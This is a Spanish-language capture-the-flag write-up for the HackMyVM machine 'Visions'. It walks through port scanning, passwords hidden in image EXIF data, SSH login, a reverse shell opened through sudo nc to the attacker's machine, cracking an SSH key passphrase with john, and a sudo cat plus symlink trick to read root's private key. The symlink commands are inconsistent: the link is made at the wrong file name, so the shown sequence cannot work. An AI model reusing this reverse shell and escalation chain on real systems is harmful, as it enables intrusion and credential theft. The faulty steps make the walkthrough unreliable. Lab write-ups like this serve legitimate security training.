cd ~/blog

~/writeups/hmv/091-visions.md

091 - Visions

easy Linux hmv 30-04-2024
EXIF / steganography password disclosuresudo nc Privescsudo cat + symlink to root id_rsa
hackmyvm.eu/machines/machine.php?vm=Visions

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS -n -Pn -oG 01-allPorts 192.168.1.119
 nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.119
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-30 14:22 -04
Nmap scan report for 192.168.1.119
Host is up (0.00042s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 85:d0:93:ff:b6:be:e8:48:a9:2c:86:4c:b6:84:1f:85 (RSA)
|   256 5d:fb:77:a5:d3:34:4c:46:96:b6:28:a2:6b:9f:74:de (ECDSA)
|_  256 76:3a:c5:88:89:f2:ab:82:05:80:80:f9:6c:3b:20:9d (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.73 seconds

El código del sitio tiene una pista sobre lo "invisible" y una imagen:

<!-- 
Only those that can see the invisible can do the imposible.
...
-alicia -->
<img src="white.png" />

En los datos EXIF de la imagen hay una contraseña, y con aperisolve descubrimos otras credenciales:

 exiftool white.png
...
Comment: pw:ihaveadream
...
# aperisolve.com → sophia/seemstobeimpossible

Iniciamos sesión por SSH como alicia:

 ssh alicia@192.168.1.119
alicia@192.168.1.119's password: ihaveadream
alicia@visions:~$

La escalada es una cadena de usuarios. Primero, alicia puede ejecutar nc como emma:

alicia@visions:/home$ sudo -l
...
User alicia may run the following commands on visions:
    (emma) NOPASSWD: /usr/bin/nc

alicia@visions:/home$ sudo -u emma nc -e /bin/bash 192.168.1.3 1234 &>/dev/null & disown

 ncat -nlvp 1234
Ncat: Connection from 192.168.1.119:55442.
emma@visions:/home$

Con las credenciales de aperisolve cambiamos a sophia y obtenemos la flag:

alicia@visions:/tmp$ su sophia
Password: seemstobeimpossible
sophia@visions:/tmp$

sophia puede ejecutar cat (como cualquier usuario) sobre un archivo concreto de isabella:

sophia@visions:~$ sudo -l
...
User sophia may run the following commands on visions:
    (ALL : ALL) NOPASSWD: /usr/bin/cat /home/isabella/.invisible

sophia@visions:~$ sudo -u isabella /usr/bin/cat /home/isabella/.invisible
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----

Crackeamos la passphrase de esa clave con john y accedemos como isabella:

 /opt/john/run/ssh2john.py id_rsa_isabella > hash
 /opt/john/run/john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
invisible        (id_rsa_isabella)
...

Como isabella controla el archivo .invisible, lo reemplazamos por un symlink a la id_rsa de root. Luego, desde sophia, el sudo cat (que se ejecuta como root) leerá la clave de root a través del enlace:

isabella@visions:~$ mv .invisible .invisible_old
isabella@visions:~$ ln -s /root/.ssh/id_rsa .invisible_old

sophia@visions:~$ sudo -u root /usr/bin/cat /home/isabella/.invisible
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----

Nos conectamos como root con esa clave:

 chmod 600 id_rsa_root
 ssh root@192.168.1.119 -i id_rsa_root
Linux visions 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
...
root@visions:~#

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados